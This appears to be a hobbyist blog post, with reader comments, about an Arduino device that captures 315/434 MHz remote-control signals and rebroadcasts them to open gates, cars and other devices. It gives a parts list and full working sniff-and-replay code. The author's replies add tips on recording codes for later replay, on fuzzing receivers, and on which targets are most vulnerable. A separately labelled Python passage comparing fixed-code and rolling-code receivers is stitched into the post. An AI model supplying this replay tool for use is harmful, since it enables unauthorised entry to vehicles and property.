RF Sniffer – open gates, cars, and RF remote controlled devices with ease.


The more I get to play with hardware, the more I get to see how security is lacking or implemented poorly (and I’m being very polite here). This time, I would like to share my 315MHz/434MHz RF Sniffer project, which can be used to open poorly protected gates, cars, etc. Nothing new under the sun, only my own take on building such a device.


TIP – The size of the antenna is VERY important. Don’t neglect it – use the right length and use a wave calculator for future reference.


The story

I wanted to see how easy it is to open a keyless car using an Arduino. And then I wanted to simultaneously control multiple appliances operating on different frequencies (315MHz/434MHz).

Using the following design, you can easily make a fuzzer to randomly open/close/control all kinds of RF receivers out there. You have been warned.

Current version of the sniffer will resend whatever it sniffs 10 times. Behavior is easily changeable.

I am using the RCSwitch library to reduce heavy thinking on my part. Mission accomplished.
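Why resending a sniffed value works against a fixed-code receiver, and what a receiver-side freshness check changes, as an added example that is not part of the original post. The frame layout (counter plus truncated HMAC), the key and the window size are assumptions made for illustration, not any real remote's protocol.

```python
import hashlib
import hmac

KEY = b"constructed-demo-key"  # constructed secret shared by remote and receiver
WINDOW = 16                    # assumed look-ahead for missed button presses

class FixedCodeReceiver:
    """Static code: every captured frame stays valid forever."""
    def __init__(self, code):
        self.code = code

    def accept(self, frame):
        return frame == self.code

def rolling_frame(key, counter):
    """32-bit counter followed by an 8-byte truncated HMAC-SHA256 tag."""
    msg = counter.to_bytes(4, "big")
    return msg + hmac.new(key, msg, hashlib.sha256).digest()[:8]

class RollingCodeReceiver:
    """Accepts a frame only if the tag verifies and the counter is fresh."""
    def __init__(self, key, last_counter=0):
        self.key = key
        self.last = last_counter

    def accept(self, frame):
        if len(frame) != 12:
            return False
        counter = int.from_bytes(frame[:4], "big")
        if not hmac.compare_digest(frame, rolling_frame(self.key, counter)):
            return False  # forged or corrupted frame
        if not self.last < counter <= self.last + WINDOW:
            return False  # replay of an old frame, or too far ahead
        self.last = counter
        return True

def demo():
    fixed = FixedCodeReceiver(5592405)  # constructed 24-bit code
    out = {"fixed_first": fixed.accept(5592405),
           "fixed_replay": fixed.accept(5592405)}
    rx = RollingCodeReceiver(KEY)
    frame = rolling_frame(KEY, 1)       # one button press
    out["rolling_first"] = rx.accept(frame)
    out["rolling_replay"] = rx.accept(frame)
    out["rolling_next"] = rx.accept(rolling_frame(KEY, 2))
    return out

if __name__ == "__main__":
    print(demo())
```

The fixed-code receiver accepts the same frame on every presentation, while the rolling-code receiver accepts each counter value once and rejects the resend.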


Shopping List

Amount  Part Type            Properties
2       Inductor             wire antenna
1       Red LED – 5mm        package 5 mm [THT]; leg yes; color Red (633nm)
1       Arduino Uno (Rev3)   type Arduino UNO (Rev3)
1       315Mhz RF-LINK_RX    package rf-link_rx; part # WRL-10533
1       434Mhz RF-LINK_RX    package rf-link_rx; part # WRL-10532
1       315Mhz RF-LINK_TX    package rf-link_tx; part # WRL-10535
1       434Mhz RF-LINK_TX    package rf-link_tx; part # WRL-10534



We connect both receivers/transmitters like the following:



And here is the Arduino code. Use at your own risk.

/*
 * RF Sniffer (C) Elia Yehuda 2014
 * This program was coded.
 * No warranty whatsoever.
 * Using this program will cause something, most likely problems.
 */

#include <RCSwitch.h>

// number of times to resend sniffed value. use 0 to disable.
#define RESEND_SNIFFED_VALUES 10

// ye, thats the led pin #
#define LED_PIN 13

// class for 315 receiver & transmitter
RCSwitch rf315Switch = RCSwitch();
// class for 434 receiver & transmitter
RCSwitch rf434Switch = RCSwitch();

void setup()
{
        // print fast to console (baud rate is an assumption; match your serial monitor)
        Serial.begin(115200);
        // the LED pin must be an output before digitalWrite() can drive it
        pinMode(LED_PIN, OUTPUT);

        // 315 receiver on interrupt #0 (pin #2)
        rf315Switch.enableReceive(0);
        // 315 transmitter on pin #4
        rf315Switch.enableTransmit(4);
        // how many resends
        rf315Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        // 434 receiver on interrupt #1 (pin #3)
        rf434Switch.enableReceive(1);
        // 434 transmitter on pin #5
        rf434Switch.enableTransmit(5);
        // how many resends
        rf434Switch.setRepeatTransmit(RESEND_SNIFFED_VALUES);

        Serial.println("[+] Listening");
}

// simple decimal-to-binary-ascii procedure
// (returns a pointer to a static buffer that is overwritten on every call)
char *tobin32(unsigned long x)
{
        static char b[33];
        b[32] = '\0';
        for ( int z = 0; z < 32; z++) {
                b[31 - z] = ((x >> z) & 0x1) ? '1' : '0';
        }
        return b;
}

// the switch is passed by reference so the object is not copied on every call
void process_rf_value(RCSwitch &rfswitch, int rf)
{
        char str[120];
        unsigned long value;

        // flash a light to show transmission
        digitalWrite(LED_PIN, true);

        value = rfswitch.getReceivedValue();
        if (value) {
                // snprintf keeps the message inside str[] whatever the field widths
                snprintf(str, sizeof(str), "[+] %d Received: %s / %010lu / %02u bit / Protocol = %u",
                        rf, tobin32(value), value, rfswitch.getReceivedBitlength(), rfswitch.getReceivedProtocol() );
        } else {
                snprintf(str, sizeof(str), "[-] %d Received: Unknown encoding (0)", rf);
        }
        Serial.println(str);

        // resend the sniffed value (RESEND_SNIFFED_VALUES times)
        rfswitch.send(value, rfswitch.getReceivedBitlength());

        // reset the switch to allow more data to come
        rfswitch.resetAvailable();
        // stop light to show end of transmission
        digitalWrite(LED_PIN, false);
}

void loop()
{
        if (rf315Switch.available()) {
                process_rf_value(rf315Switch, 315);
        }

        if (rf434Switch.available()) {
                process_rf_value(rf434Switch, 434);
        }
}

9 thoughts on “RF Sniffer – open gates, cars, and RF remote controlled devices with ease.”

    1. ofc.

      The hw scheme I provided is 100% same as the one I used in my testings. The sw part is a stripped-down code of my full project, but is enough to get one started.

      With a few modifications to the code, one can simply record the sniffed data instead of immediately resending it. Also, for useful results, when resending, a delay() should be considered for obvious reasons ;)

      Most vulnerable targets I found are remote-controlled gates and old cars. Also weather stations seem to produce a lot of noise.

      Using same logic, one can add 816Mhz tx/rx to cover most widely used RF out there, and rule them all :)

  1. Awesome project. Can u give any details as to how you can save the codes it sniffs? I’m looking to do an automation project and this fits the bill.


  2. Simple circuit, simple code – but not flying! Receiver not seeing anything? I see chatter on other sites about a 1M resistor between data line and ground and a 330 Mfd cap and production changes on RX board pushing less power thru data line. No joy! Any clues???

  3. Ziggy, Really like your project. I have the library, replicated the circuit and code – and quadruple-checked everything – but the receivers are never ‘available’. I have three 315 MHz devices to ‘sniff’ but with/without antennas, placing devices near/far from the antenna and even ordering/installing new RX / TX boards – has no impact on the results. Commenting out the .available test just yields the same data stream regardless of the device I test and, in fact, powering off the circuit has no impact on the data stream. Used SparkFun supplier.
    Please, any hints for me?

    1. I totally understand your frustration since it took me a while and some trial & error to get all to work as smoothly (eg, I too have looked into connecting a resistor to the data line…).

      I think you should first make sure your hw is 100% supported with this library; maybe you need to use a different lib/code to match your receiver – play with the code until you start getting some RAW (hex) data, then adjust it to your purpose.

